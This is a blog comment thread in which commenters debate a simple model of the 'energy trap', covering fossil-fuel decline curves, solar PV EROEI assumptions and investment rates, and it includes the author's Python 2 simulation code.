More things. Although I think that the Hubbert curve of your assumption is realistic, it would be interesting to try a pessimistic one to check the results in a "very bad, near worst scenario", like a Seneca cliff. The Seneca cliff is becoming popular on peak oil movement (you know... always expecting the worst), but there is reasons to admit as a valid scenario altough not the most probable.
Last, I didn't find the Phyton code. Do you linked it?
Hi Oatleg,
"One of the problems of the PV expansion is that takes time. The infrastructure (factories) grows exponentialy, but at manageable percentage."
I include a 7-year delay in the simulation for the amount of time necessary to realize FF production has peaked and to ramp up PV factories. This number is adjustable.
"it would be interesting to try a pessimistic one to check the results in a "very bad, near worst scenario", like a Seneca cliff. The Seneca cliff is becoming popular on peak oil movement"
I am already making extremely pessimistic assumptions for rates of decline. Using the assumptions I've made, all fossil fuels decline by half in 34 years. That decline is at least twice as fast as any that would actually occur.
I just don't see any reason at all why FF production would follow a Seneca cliff. Statistically, it just doesn't make any sense. Presumably, the reason FF production follows a bell curve is because discoveries are normally distributed. As a result, there is just no chance that all fossil fuel production from all wells (gas and oil) in all fields would be synchronized, and all drop off a cliff at the same time. That is like flipping coins and getting heads a million times in a row. The chances of that are so close to being zero that I don't think it's a serious possibility.
Hi oatleg,
"Sorry. I don't understand well your tables. Are you proposing a fixed percentage investment over GDP?"
No. The numbers are fractions of 1, where 1 is the original gross energy available. So a value of 0.05 for "invest_pv" means that 5% of initial energy is invested in building PV panels that year.
Hi Tom,
I would be interested to see the source code of your program, but a few thoughts spring to mind:
Your table shows (I think) that a 0.05 energy investment in PV would yield an immediate 0.0167 return in energy each year. That doesn’t seem right to me, given that most of the energy for PV is invested up-front. If we accept an EROEI of 5 for PV (some will think this harsh, some generous), then we can expect that a 0.05 energy investment to pay off as 0.25 units of energy over the lifetime (25 years [1]) of the system. This would imply 0.01 annual energy units per year return on the 0.05 annual energy unit investment. This is also an overestimate of the energy return, because such a huge increase in renewables production would also require a commensurate increase in manufacturing capacity — we would not just be building more PV panels and turbines, but more factories, supply chains, mining equipment, etc — all of which would be an up-front energy cost.
That’s the most glaring technical problem I can see, the other problems are of a systems nature. You assume that you can change fuel availability in such a significant way, but that nothing else will change — this is an error.
The first problem I can see, is that the reduction in availability would be mostly borne by the developed world. What might be a 6% global energy deficit, would be more like 15% in the developed world (which uses about 40% of global energy). This is because developing countries derive more value from their (much smaller) energy spending, and hence can out-bid developed countries for the limited supplies that were available (this process is already underway: the energy consumption of the developed world is decreasing).
Clearly, the developed world would not tolerate a 15% reduction in its liquid fuel supply, so we would likely see a marked increase in conflict. This would lead to a reduction in global trade, and reduced investment, which would negatively affect the roll-out of renewable energy.
This is a thought-experiment only, not a prediction. I’m just thinking about how global systems might react to a decrease in energy supply of “only” 6%. The point is to illustrate that it is not reasonable to expect no flow-on effects of sharply decreasing energy supplies.
Cheers, Angus
[1] I realise that a solar PV system will still work after 25 years, but this is typically the lifetime that is assumed when working out the stats
Hi Angus,
"That doesn’t seem right to me, given that most of the energy for PV is invested up-front. If we accept an EROEI of 5 for PV ... then we can expect that a 0.05 energy investment to pay off as 0.25 units of energy over the lifetime (25 years [1]) of the system. This would imply 0.01 annual energy units per year return..."
I assume an ERoEI of 10 and a lifetime of 30 years. The formula (0.05*10)/30 = 0.0167
I assume that PV has an ERoEI of 10. That is well below what is indicated in the most recent studies published. It is also below the studies cited by the National Renewable Energy Labratory:
Those studies are more than 15 years old and so are almost certainly an underestimate of PV ERoEI, since ERoEI has been improving.
I do not wish to cherry-pick the few EROI studies produced by what appears to be a doomsday group. There are only two recent studies showing PV with an ERoEI lower than 5, but those are extreme outliers and have serious problems. I'm using a figure which is representative of the results that researchers generally obtain.
"we would not just be building more PV panels and turbines, but more factories, supply chains, mining equipment, etc — all of which would be an up-front energy cost."
Most ERoEI studies include energy costs of mining, installation, and so on. Perhaps they don't include the energy cost of building the mining equipment and factories. However, if fossil fuels peaked and we started transitioning to renewables, we could STOP investing so much energy in new gas pipelines, new coal rail lines, new factories for turbines, and so on. These are upfront costs for ALL sources of energy.
It's not possible to find reliable information on this, because nobody does ERoEI studies which are so detailed that they include the energy cost of building mining equipment or trains. However, with both fossil fuels and PV, things like that are an upfront investment in both cases, and there is no a priori reason to assume that PV requires more transportation or mining equipment than coal (perhaps less, since PV panels are transported only once during their lifetime).
"You assume that you can change fuel availability in such a significant way, but that nothing else will change — this is an error. "
I do not assume that. There would be all kinds of changes in the economy right away. The economy would sacrifice the LEAST important uses of energy first. It would suddenly become expensive to blast your air conditioner all day long.
However, that's just beside the point. It is not relevant to the "energy trap".
"The first problem I can see, is that the reduction in availability would be mostly borne by the developed world. What might be a 6% global energy deficit, would be more like 15% in the developed world (which uses about 40% of global energy). "
If you exclude oil, the vast majority of energy worldwide is from domestic sources. The United States gets almost all its coal and gas from its own territory, and so does China, India, and most other places.
When talking about the energy trap, we are dealing with the energy used to BUILD renewables. That energy is overwhelmingly thermal energy and electricity which would come from coal and gas at the beginning, not from oil.
...Obviously, we could envision all kinds of political possibilities here. Perhaps that decline of 6% for one year would cause President Trump to go crazy and nuke somebody. Maybe there would be panic, chaos. I have no way of predicting those things. However, it is a separate issue from the energy trap. The trap itself is overcome easily enough by basic, automatic market mechanisms.
> I assume that PV has an ERoEI of 10.
...Overbuilt to keep production constant year-round, and with 7 days of battery back-up?
"...Overbuilt to keep production constant year-round, and with 7 days of battery back-up?"
No. In an energy trap, I think we would use fossil fuel plants in a load following manner. Even coal plants can be used in that way, to some extent. I don't think there would be any overbuilding or battery back-up until renewable penetration reached a certain level (perhaps 20%), at which point we'd already be well out of the energy trap.
Here is the python source code.
(NOTE: I replaced tabs with dollar signs, which you can revert by typing "cat yourFileName.py|tr '$' '\t > yourNewFileName.py'" on a Mac command line, or you can do it manually in a text editor. I had to replace tabs with dollar signs because white space is important in python but there is no way to include tabs in a blogger comment. You can run the source code by installing python and typing 'python yourFileName.py' at a command prompt).
The code is as follows:
#.
import math
#
# You can change these parameters
#
eroei_pv = 10.0
eroei_ff = 15.0
run_years = 30
# Number of years before a PV plant expires
pv_lifetime = 30
# The standard deviation of the Gaussian decline curve
std_dev = 30
# The fraction of FF energy investment which is a recurring cost instead of an
# upfront cost for building FF power plants. Even fossil fuel plants require
# SOME upfront cost, which will cease when FF start declining
fraction_ff_invest_operating = 0.9
# How many rows to print; one every n years
print_every_n_year=1
# How many years before decision-makers discover that FF are on a permanent
# decline so don't invest in new FF plants and start investing in PV
figure_out_year=7
#
# Do not change these
#
orig_net_ff = 1.0 - (1.0/eroei_ff)
invest_pv = 0.0 # initial PV investment is 0
gross_ff = 1.0 # initial FF amount extracted is 1
gross_total = 1.0
old_pv_investments=[] # This is used to keep track of and remove PV panels which have expired due to age
def gaussian_curve(num, std_dev):
$return math.exp(-(math.pow(num, 2))/(2*math.pow(std_dev, 2)))
# Print table header
print "year gross_ff gross_pv gross_total net_total invest_pv invest_ff fraction_original_net"
for year in range(0,run_years):
$gross_ff = gaussian_curve(float(year), std_dev)
$# After it's discovered that FF are on a permanent decline, stop investing
$# so much in new FF plants and extraction
$if (year < figure_out_year):
$$invest_ff = 1.0 / eroei_ff
$else:
$$invest_ff = (gross_ff / eroei_ff) * fraction_ff_invest_operating
$# After it's discovered that FF are on a permanent decline, start investing
$# in PV
$if (year > figure_out_year):
$$if (year < std_dev):
$$$invest_pv = (1.0 / eroei_pv) / 2.0
$$else:
$$$invest_pv = (1.0 / eroei_pv)
$# Old PV panels are expired after pv_lifetime
$old_pv_investments.insert(0,invest_pv)
$if (len(old_pv_investments) > pv_lifetime):
$$old_pv_investments.pop()
$# Add up all PV contribution from all panels in the last n years which
$# are still operating
$gross_pv = 0.0
$for old_pv_inv in old_pv_investments:
$$# PV panels generate this much each year
$$gross_pv += old_pv_inv * eroei_pv / pv_lifetime
$# Sum totals
$gross_total = gross_ff + gross_pv
$net_total = gross_total - invest_ff - invest_pv
$# Print chart
$if (year % print_every_n_year == 0):
$$print "%2d %9.4f %9.4f %9.4f %9.4f %9.4f %9.4f %9.4f" \
$$$% (year, gross_ff, gross_pv, gross_total, net_total, \
$$$$invest_pv, invest_ff, (net_total/orig_net_ff)) | http://bountifulenergy.blogspot.com/2016/07/the-energy-trap.html | CC-MAIN-2017-17 | refinedweb | 2,126 | 63.7 |
AxKit::App::TABOO::Data::Comment - Comment Data object for TABOO
use AxKit::App::TABOO::Data::Comment; $comment = AxKit::App::TABOO::Data::Comment->new(); $comment->load(limit => {sectionid => $self->{section}, storyname => $self->{storyname}}); $comment->tree; $comment->adduserinfo; $timestamp = $comment->timestamp();
This Data class contains a comment, which may be posted by any registered user of the site. Each object will also contain an identifier of replies to the comment, that may be replaced with a reference to another comment object.
This class implements several methods, reimplements the load method, but inherits some from AxKit::App::TABOO::Data.
new($self-dbconnectargs())>
The constructor. Nothing special.
load(what => fields, limit => {key => value, [...]}
The load method is not reimplemented but needs elaboration. It follows the convention of the load methods of the parent class, but to uniquely identify a comment, one has to set certain
limits.
First one should identify the story that the comment is attached to, by giving
storyname and
sectionid, see AxKit::App::TABOO::Data::Story for details.
To identify the comment itself, TABOO introduces the concept of a commentpath. A commentpath is a string that identifies a comment by appending the username of the poster for each reply posted, separated by a
/. In computer science terms, I think this is known as a trie. Thus, commentpaths will grow as people respond to each other's comments. For example, if user bar replies to user foo, the commentpath to bar's comment will be
/foo/bar. The commenpath will typically be in the URI of a comment. If the same user post more replies to a comment, they will be suffixed with e.g.
_2 for the second comment.
The
commentpath,
sectionid and
storyname together identifies a comment.
adduserinfo()
When data has been loaded into an object of this class, it will contain a string only identifying the user who posted the comment. This method will replace that strings with a reference to a AxKit::App::TABOO::Data::User-object, containing the needed user information.
reply($comment)
This method can be used to attach a reply to a comment, or to retrieve a reply. If no argument is given, it will return the reply object if it exists. To attach a comment, give an argument which is an instance of this class or an instance of AxKit::App::TABOO::Data::Plurals::Comments.
tree([$what, $orderby])
This method has changed considerably since earlier releases. You may call it on any object of this class that has
commentpath,
sectionid and
storyname defined. It will return an instance of the AxKit::App::TABOO::Data::Plurals::Comments class consisting of all comments in the tree with the comment in the object it was called on as root.
timestamp([($sectionid, $storyname, $commentpath)|Time::Piece])
The timestamp method will retrieve or set the timestamp of the comment. If the timestamp has been loaded earlier from the data storage (for example by the load method), you need not supply any arguments. If the timestamp is not available, you must supply the sectionid, storyname and commentpath identifiers, the method will then load it into the data structure first.
The timestamp method will return a Time::Piece object with the requested time information.
To set the timestamp, you must supply a Time::Piece object, the timestamp is set to the time given by that object. for example just want the title of the comments, not all their content.
These are the names of the stored data of this class:
timestamp()method.
The
write_xml() method, implemented in the parent class, can be used to create an XML representation of the data in the object. The above names will be used as element names. The
xmlelement() and
xmlns() methods can be used to set the name of the root element and the namespace respectively. Usually, it doesn't make sense to change the defaults, which are
reply
replyshould check the class of the object it is passed.
See AxKit::App::TABOO. | http://search.cpan.org/dist/AxKit-App-TABOO/lib/AxKit/App/TABOO/Data/Comment.pm | crawl-003 | refinedweb | 659 | 54.63 |
From: Vladimir Prus (ghost_at_[hidden])
Date: 2003-12-16 02:45:26
David Abrahams wrote:
> > 1. You declare builtin called 'set.difference'.
>
> You could call it anything.
>
> > 2. Insides the 'set' module, you put
> >
> > IMPORT : set.difference : $(_name) : difference : localize ;
> > EXPORT set : difference ;
> >
> > 3. After 'set.jam' is read, the 'difference' rule is exported into global
> > scope, and now 'set.difference' behaves as rule declared in 'set', but is
> > in fact implemented in 'C'
>
> Yep.
>
> > The good thing about the proposal is that it does not require a new
> > builtin.
>
> You mean _my_ proposal?
Yes.
> > The only thing I don't like is cluttering the global namespace.
> > After all, the implementation -- the .c files declaring new rules -- is
> > better live in separate files in 'modules' directory, as builtins.c is
> > large enough already. It's nicer if namespaces follow that layout, though
> > it's not critical.
>
> It should be very easy to get builtin rule declarations to go into a
> specific module. You could even do it by searching for "." in the
> name.
Interesting. In this case one would not need the IMPORT/EXPORT stuff at all,
right?.
This is usefull for trying both alternatives and understanding how much
speedup we get. Or we might even make NATIVE_RULE do nothing when
native rule is not available, which would Boost.Build work with several bjam
version, not necessary the latest. And finally, if you introduce builtin and
remove jam version of the rule, you don't have a place where to put
docstring.
I'm not sure either argument is a killer one, | https://lists.boost.org/boost-build/2003/12/5406.php | CC-MAIN-2019-30 | refinedweb | 262 | 69.07 |
Contents
Contents
Jython 2.3
Builtins
yield is always a keyword. [done]
enumerate() built-in added. [done]
int() will now return a long instead of raising OverflowError if a number is too large.
built-in types support extending slicing syntax.
list.insert() changed to be consistent with negative slice indexing. [done]
list.index() takes optional start, stop arguments. [done]
Dictionaries gained a pop() method and .fromkeys() class method. [done]
dict() constructor takes keyword arguments. [done. also applied in 2.2]
assert no longer checks debug flag.
Many type objects are now callable. [possibly done]
PEPs
PEP 218: A Standard Set Datatype
PEP 263: Defining Python Source Code Encodings
PEP 273: Importing Modules from Zip Archives [done]
PEP 278: Universal Newline Support [done]
PEP 307: Pickle Enhancements
Reference: What's New in Python 2.3
Jython 2.4
Built-in set, frozenset
Unifying int/long
Generator expressions
Function/method decorators
Multi-line imports
Reference: What's New in Python 2.4
Jython 2.5
Conditional expressions
'with' statement
Absolute & relative imports
Unified try/except/finally
New generator features
Exceptions as new-style classes
The index method
Reference: What's New in Python 2.5
Replace jythonc
j. See for the general idea.
Solidify Import System
Jython adds to Python's import system to handle loading from Java's classpath and to load from jar files. It's not exactly clear what modifications are in place and what techniques are best for adding jar files to the path at runtime and things like that. An informational JEP explaining what's been added and how things relate to both the Python and Jython sides would be nice.
Brett Cannon has been working on rewriting all of Python's import machinery in Python; see for the code.
Complete Java to Python naming integration
Java allows a method and field of the same name to exist in the same class. Python only has a single namespace for these items. This leads to methods being hidden in a Java instance in Jython if the instance has a field of the same name. In addition, the bean convenience methods that map object.getField() in Java to object.field in Jython lead to collisions. See and. A standard system for renaming fields and methods to avoid collisions and a JEP explaining the whole thing would be most welcome. | https://wiki.python.org/jython/BiggerTasks?action=diff | CC-MAIN-2016-40 | refinedweb | 390 | 68.06 |
Opened 3 years ago
Closed 3 years ago
#21341 closed New feature (fixed)
Clean way of making https requests with test client
Description
This is the current way of making an https request with the testing client:
from django.test import Client client = Client() client.get('/', {'wsgi.url_scheme': 'https'})
This is quite obscure and undocumented, something like
client.get('/', secure=True)
would be far cleaner. The way
django.test.client.Client
and
django.test.client.RequestFactory
are build, we would need to modify each request method in both of them.
Change History
This looks pretty good to me. I left a few comments on the pull request. I'm marking as RFC anyway because these comments are minor and could be made by the committer.
comment:9 Changed 3 years ago by
Thanks for the review, suggestions applied!
comment:10 Changed 3 years ago by
In: 99b681e227b5b7880d6edd0d8dd670034d431859
Fixed #21341 -- Eased https requests with the test client
PR sent:
All the request methods of django.test.client.Client receive a secure
argument that defaults to False indicating wether or not to make the
request through https. | https://code.djangoproject.com/ticket/21341 | CC-MAIN-2016-44 | refinedweb | 185 | 75.3 |
<schema targetNamespace="" xmlns: <include schemaLocation= ""/> <element name="doc" type="Body"/> <complexType name="Body"> <element name="body"> <attribute name="bodyText" type="string"/> </element> </complexType> <complexType name="HTMLBodyCT"> <element name="HTMLBody"> <complexType> <element name="h1" type="string" content="text"/> </complexType> </element> </complexType> </schema>
This schema has defined the doc element as being a Body data type, and the doc element will contain a body child element that has a bodyText attribute. Now suppose you also want to be able to create messages from other body data types, such as the HTMLBodyCT data type defined in the schema. You could do this by creating a group element with choices.
Another option is to declare the schema as above and then substitute the HTMLBodyCT data type for the Body data type in the instance document. To do this, you will need to reference the schema instance namespace in the instance document. To use the HTMLBodyCT data type, you would need to create an instance document such as this:
<?xml version="1.0"?> <northwindMessage:doc xmlns: <HTMLBody> <h1>"Hello, world"</h1> </HTMLBody> </northwindMessage:doc>
In this example, you have used the xsi:type attribute to reference a type defined in the schema (HTMLBodyCT). The xsi:type is part of the schema instance namespace and is used to override an element's type with another type that is defined in the schema. In this example, you have now redefined the doc element as being of HTMLBodyCT data type instead of a Body data type. You could also have defined the HTMLBodyCT data type in a separate schema and used the include element in the top-level schema.
Summary
Schemas enable you to associate data types with attributes, create your own data types, and define the structure of your document using well-formed XML. Schemas are used to define elements that are associated with a name and a type. The type is either a data type or one or more attributes or elements. Elements can be grouped together in group elements, and attributes can be grouped together in attributeGroup elements. The group and attributeGroup elements can either be used locally or they can have document level scope.
Schemas provide many advantages over DTDs; namely, they use namespaces, they utilize a wide range of data types, and they are written in XML. It's likely that schemas will gradually replace DTDs over the next few years. Schemas will be discussed in more detail when we look at BizTalk in Chapter 8 and the Document Object Model in Chapter 11. | http://www.brainbell.com/tutors/XML/XML_Book_B/Overriding_Data_Types.htm | CC-MAIN-2018-43 | refinedweb | 421 | 57.5 |
Hi all,
I am wondering how to get the value a field frorm the first row without looping through all the rows?
Thanks
Hi all,
I am wondering how to get the value a field frorm the first row without looping through all the rows?
Thanks
Since the arcpy.da.SearchCursor is an iterable that returns one list per row of the table/cursor, the Python built-in next() function can be used to retrieve the next row, which would be the first row if the cursor was just created or reset.
import arcpy fc = 'c:/data/base.gdb/features' # Open a cursor on some fields in a table with arcpy.da.SearchCursor(fc, ['OID@', 'SHAPE@AREA']) as cursor: row = next(cursor) # Do something with the first row of data here del cursor
Or, something very similar, use the SearchCursor next method.
Cur = arcpy.da.SearchCursor(Feature, [Flds]) row = Cur.next()
Or to use a one-liner:
value = arcpy.da.SearchCursor(in_fc, ("YourFieldName",)).next()[0]
True, for now and in the ArcPy realm, calling the search cursor's next method will get the same result. I suggested using the built-in next method because of broader changes happening with Python outside of ArcPy. For Python 3 after PEP 3114 was approved, it meant the next() iterator method was going away. The Transition Plan for PEP 3114 covers two additional changes needed for moving to Python 3:
The built-in next function was introduced in Python 2.6 to smooth the transition. Since we know that Esri has made the leap to Python 3 with ArcGIS Pro, I suggested an approach using the built-in function. For now, Esri's implementation of the ArcPy Data Access (arcpy.da) module in ArcGIS Pro still includes cursors having explicit next() methods, but I argue the current ArcGIS Pro implementation isn't very pythonic since the explicit next() methods don't add any special functionality beyond simply iterating.
Several functionally equivalent code snippets were provided. I doubt the performance differences between the different code snippets will be noticeable, let alone significant. I think it is mostly a matter of style and what you prefer.
Lately, if I don't need to re-use the cursor, I have been using a variation of the one liner offered by Xander Bakker:
import arcpy
fc = 'c:/data/base.gdb/features'
values = next(arcpy.da.SearchCursor(fc, ['OID@', 'SHAPE@AREA']))
You still have to start a loop, but you can break out of it and kill the cursor at any time: | https://community.esri.com/thread/122522-how-to-get-the-value-of-a-field-from-the-first-row-without-looping | CC-MAIN-2018-43 | refinedweb | 423 | 63.19 |
:I've been getting these panics under moderate load, : :panic: cpu_switch: not SRUN :-- : David P. Reese, Jr. daver@xxxxxxxxxxxx Here. Before you waste time trying to get a core dump, please try this patch. I believe what is happening is that a user program is calling exit1() and an interrupt is preempting it just after exit1() sets p_stat to SZOMB. This is perfectly legal to do and the DIAGNOSTIC code is improperly panicing. That's my guess, anyway. If the patch solves the problem then we will know that is what it was. -Matt Index: i386/i386/genassym.c =================================================================== RCS file: /cvs/src/sys/i386/i386/genassym.c,v retrieving revision 1.28 diff -u -r1.28 genassym.c --- i386/i386/genassym.c 7 Aug 2003 21:17:22 -0000 1.28 +++ i386/i386/genassym.c 16 Sep 2003 02:31:13 -0000 @@ -104,6 +104,7 @@ ASSYM(SSLEEP, SSLEEP); ASSYM(SRUN, SRUN); +ASSYM(SZOMB, SZOMB); ASSYM(V_TRAP, offsetof(struct vmmeter, v_trap)); ASSYM(V_SYSCALL, offsetof(struct vmmeter, v_syscall)); ASSYM(V_SENDSYS, offsetof(struct vmmeter, v_sendsys)); Index: i386/i386/swtch.s =================================================================== RCS file: /cvs/src/sys/i386/i386/swtch.s,v retrieving revision 1.26 diff -u -r1.26 swtch.s --- i386/i386/swtch.s 7 Aug 2003 21:17:22 -0000 1.26 +++ i386/i386/swtch.s 16 Sep 2003 02:31:52 -0000 @@ -228,7 +228,10 @@ movl TD_PROC(%eax),%ecx #ifdef DIAGNOSTIC cmpb $SRUN,P_STAT(%ecx) + je 1f + cmpb $SZOMB,P_STAT(%ecx) jne badsw2 +1: #endif #if defined(SWTCH_OPTIM_STATS) | http://leaf.dragonflybsd.org/mailarchive/bugs/2003-09/msg00036.html | CC-MAIN-2015-22 | refinedweb | 250 | 69.28 |
PyX — Example: drawing/strokefill.py
Stroke and fill paths at the same time
from pyx import * c = canvas.canvas() c.stroke(path.rect(0, 0, 1, 1), [style.linewidth.Thick, color.rgb.red, deco.filled([color.rgb.green])]) c.writeEPSfile("strokefill") c.writePDFfile("strokefill")
Description.
In the example code, the filled decorator is called to pass additional styles, which will then only be used for the fill operation. Other styles passed in the second argument of the
stroke method are used for both, the stroke and the fill operation. Here we set a linewidth, which only affects the stroke operation.
A complementary functionality exists as well: you can use a
deco.stroked instance to add a stroke operation within a
fill method call.
The
filled and
stroked are pre-defined instances, but they accept a modify by call operation. This is a common feature of decorators and other attributes.
Internally, the
stroke and the
fill methods are implemented by adding either
deco.stroked or
deco.filled to the list passed as the second parameter to the
stroke or
fill method of a canvas. This whole construction is then evaluated by the
draw method of the canvas instance. The draw method is really the basic operation to output a path. It transforms a path into a so-called decorated path. The mere path itself is a pure mathematical object without any information about how it should be drawn and which styles should be applied. Output-specific properties like dashing or the linewidth are not attached to the path at all. In contrast, the decorated path attaches styles and the two output operations stroke and fill to the mathematical path object. A symmetric stroke and fill operation therefore looks like
c.draw(p, l1 + [deco.stroked(l2), deco.filled(l3)])
where
c is the canvas instance,
p is the path to be stroked and filled,
l1 is a list of styles used for both stroking and filling,
l2 are additional styles used for stroking, and
l3 are additional styles used for filling. | http://pyx.sourceforge.net/examples/drawing/strokefill.html | CC-MAIN-2013-20 | refinedweb | 340 | 65.73 |
Takewhile drops one
Here’s some naughty code.
from itertools import takewhile def take_some(pred, xs): while True: for x in takewhile(pred, xs): yield x
This code abuses the “iterator building block” foundations of Python’s itertools module. Once you’ve chopped a stream’s head off using
takewhile you can’t resume processing its tail … Or can you?
A casual inspection of this function suggests it does little more than heat up the machine: we return elements,
x, from a stream,
xs, for which
pred(x) holds, then we spin at the first element for which the predicate does not hold.
When we actually run the code, things turn out rather differently:
>>> from itertools import count, islice >>> def is_even(x): ... return x % 2 == 0 ... >>> xs = take_some(is_even, count()) >>> xs.next() 0 >>> xs.next() 2 >>> xs.next() 4 >>> list(islice(xs, 10)) [6, 8, 10, 12, 14, 16, 18, 20, 22, 24]
Dropwhile, ifilter, izip
Nothing overheats. In fact
take_some behaves suspiciously like
ifilter. Let’s explore that hypothesis by zipping together an
ifilter stream and a
take_some stream and seeing if they diverge.
>>> from itertools import dropwhile, ifilter, izip >>> xs = take_some(is_even, count()) >>> ys = ifilter(is_even, count()) >>> diverge = dropwhile(lambda xy: xy[0] == xy[1], izip(xs, ys)) >>> diverge.next() C-c C-cTraceback (most recent call last): ... KeyboardInterrupt >>>
Here
itertools.dropwhile iterates through the zipped stream yielding items as soon as it detects a difference in the first and second element of a pair. This time, as you can see, we do start spinning, and we have to interrupt execution to regain control.
Small print
Our casual interpretation of
take_some was wrong. The actual documentation for
itertools.takewhile reads:
takewhile(predicate, iterable)
Make an iterator that returns elements from the iterable as long as the predicate is true. Equivalent to:def takewhile(predicate, iterable): for x in iterable: if predicate(x): yield x else: break
There you have it! Once a stream returned by
takewhile has run its course, the original
iterable is poised to yield the element immediately after the first element for which the predicate fails. That is, we drop the first element for which the predicate fails. So repeatedly applying
takewhile to a stream drops the elements for which the predicate doesn’t hold, which is to say it generates the elements for which the predicate holds, which is of course
ifilter.
Bug fixes
Yes, kind of. I could point out a couple of bugs in
take_some. First, it doesn’t work for lists. Give it a list and each application of
takewhile resumes iteration from the beginning of the list, meaning
take_some either repeats the first element of the list forever, or it spins without yielding anything:
>>> ys = take_some(is_even, [1, 2, 3, 4]) >>> ys.next() ... KeyboardInterrupt >>> ys = take_some(is_even, [0, 1, 2, 3]) >>> ys.next() 0 >>> ys.next() 0 >>> set(islice(ys, 1000000)) set([0])
We can fix that defect easily by applying
iter to the input iterable, but that exposes the second bug, that
take_some only works for infinite streams. Once we bang into the end of an iterable, we stay there, stuck in the while loop. To fix both defects we might end up with something like:
from itertools import takewhile, tee def take_some(pred, xs): while True: xs, ys = tee(xs) try: ys.next() except StopIteration: return for x in takewhile(pred, xs): yield x
The real bug fix
Actually, the real bug, which I admitted to at the outset, is in our thinking. This code abuses the iterator-building-blocks paradigm at the heart of the itertools module.
Takewhile converts one stream into another stream; the original stream has gone and if we wanted it we should have teed it first.
The Unix shell embeds this concept at the core of the language to great effect. Once again our building block is the stream but our connector, the pipeline operator, |, doesn’t allow this kind of abuse; all you can do is put a stream to its left and another to its right. The syntax won’t allow you to get the head and tail of the same stream in a single pipeline.
Here’s an awkless variant of the recent shell history meme which shows a shell pipeline in action.
$ history | tr -s ' ' | cut -f 3 -d ' ' | sort | uniq -c | sort -rn 172 cd 147 svn 73 bin/mheg 57 make 54 ls 40 emacs 37 pwd ...
Here’s a slightly more interesting variant which only shows commands appearing after a pipeline operator. (It’s not bombproof, but it’ll do for now.)
$ history | grep -Eo '\| *\w+' | tr -d '| ' | sort | uniq -c | sort -rn 10 head 8 cut 7 grep 6 tr 5 xargs 4 sort 3 wc 3 uniq 3 less ...
Pipe Links
By way of an apology for wasting your time, here are some solid gold links.
“Generator Tricks for Systems Programmers”, a presentation made by David M. Beazley at PyCon’08. I wasn’t there, but for once the slides (PDF) standalone well, and despite the title it’s neither tricksy nor just for systems programmers. Experienced Python programmers might choose to skip over the first few slides; by the end of the presentation, the material gets much more advanced[1].
“Shell-like data processing” by Maxim Krikun in the online Python Cookbook, which overloads the bitwise or operator,
|, to implement a Pythonic pipeline, an idea you can find extended in “Assembly Line Syntax” by Patrick Roberts and revised by Michael Foord, this time using the right shift operator as a connector.
Pipelined Python
81.107.39.38 - ... "GET /ply/ HTTP/1.1" 200 7587 81.107.39.38 - ... "GET /favicon.ico HTTP/1.1" 404 133 81.107.39.38 - ... "GET /ply/bookplug.gif HTTP/1.1" 200 23903 81.107.39.38 - ... "GET /ply/ply.html HTTP/1.1" 200 97238 81.107.39.38 - ... "GET /ply/example.html HTTP/1.1" 200 2359 66.249.72.134 - ... "GET /index.html HTTP/1.1" 200 4447 ...
In his presentation David Beazley shows some elegant and idiomatic Python code to sum the total number of bytes transferred in an Apache httpd server log (the final field on each line of the log file shown above). You’ll notice how clean and declarative it is. Each generator expression builds upon the one on the preceding line. The source of the stream,
wwwlog, is a file object which, in the iterable context shown here, yields lines on demand. Nothing really happens until the final reduction,
sum, at which point data flows smoothly through. Stream elements — lines, words, ints — are processed one at a time, and nothing accumulates except the final total.
wwwlog = open("access-log") bytecolumn = (line.rsplit(None,1)[1] for line in wwwlog) bytes = (int(x) for x in bytecolumn if x != '-') print "Total", sum(bytes)
Here’s an alternative using the Python pipeline approach mentioned in the previous section. Note that in my server access logs it’s the 9th field (whitespace separated, counting from zero) which gives the number of bytes transferred, and for variety I’m pattern matching this field to a string of digits.
wwwlog = open("access-log") bytes = wwwlog | cut(9) | grep(r'\d+') | xlate(int) print "Total", sum(bytes)
Cut,
grep and
xlate are simple classes which implement the numeric __ror__ method.
import itertools import re class xlate(object): "Translate the input stream by applying a function to each item". def __init__(self, fn): self.fn = fn def __ror__(self, stream): return itertools.imap(self.fn, stream) class cut(xlate): "Cuts a whitespace separated column from a stream of lines." def __init__(self, column): super(cut, self).__init__(lambda s: s.split()[column]) class grep(object): "Grep lines which match an re from a stream of lines." def __init__(self, pattern): self.match = re.compile(pattern).match def __ror__(self, stream): return itertools.ifilter(self.match, stream)
[1] It could be that I’m reading too much into the pipe metaphor, but I’m intrigued by the caption to the photo on David M. Beazley’s homepage. What can he mean?
Dave working on his latest project — “you know, it’s a series of tubes.” | http://wordaligned.org/articles/takewhile-drops-one | crawl-002 | refinedweb | 1,368 | 64.61 |
You don't want to invoke one of the JUnit test runners. Instead, you would like to run your test directly.
Add a main( ) method to your test case. Or, use Ant to run your tests as discussed in Chapter 3.
Adding a main( ) method can make a class easier to run. Most IDEs allow you to click on a class and select some sort of "run" option from a popup menu, provided the class has a main( ) method. Here is a sample main( ) method for our TestGame class:
public class TestGame extends TestCase { ... public static void main(String[] args) { junit.textui.TestRunner.run(new TestSuite(TestGame.class)); } }
When executed, this method runs the test suite in text mode. Output is sent to the console.
Recipe 4.3 shows how to run unit tests. Chapter 3 shows how to run tests using Ant. | https://etutorials.org/Programming/Java+extreme+programming/Chapter+4.+JUnit/4.9+Running+a+Test+Class+Directly/ | CC-MAIN-2022-21 | refinedweb | 143 | 85.49 |
, no doubt many of its excesses will be tamed from within the project. But some users aren’t waiting around for Kubernetes to get any easier to work with, and have rolled their own solutions to many common problems with Kubernetes in production.
Goldpinger: Visualize Kubernetes clusters
Humans are visual creatures. Graphs and charts make it easier for us to understand the big picture. And given the scope and complexity of a Kubernetes cluster, we could use all of the visual help we can get..
K9s: Full-screen Kubernetes CLI UI
Admins love “single pane of glass” utilities. K9s is a full-screen CLI UI for Kubernetes clusters. It gives you views of running pods, logs, and deployments at a glance, along with quick access to a shell. Note that you will need to grant users Kubernetes read privileges at the user and namespace level for K9s to work properly.
Kops: Command-line ops for Kubernetes clusters
Developed by the Kubernetes team, Kops allows you to manage Kubernetes clusters from the command line. It supports clusters running on AWS and GCE, with VMware vSphere and other environments in the works. In addition to automating the setup and teardown process, Kops helps with other kinds of automation. For instance, it can generate Terraform configurations to allow a cluster to be redeployed using Terraform.
Kubebox: Terminal console for Kubernetes
An advanced terminal console for Kubernetes, Kubebox provides more than just a glorified shell to Kubernetes and its API. It provides interactive displays of memory and CPU utilization, lists of pods, running logs, and configuration editors. Best of all, it’s available as a standalone application for Linux, Windows, and MacOS.
Kube-applier
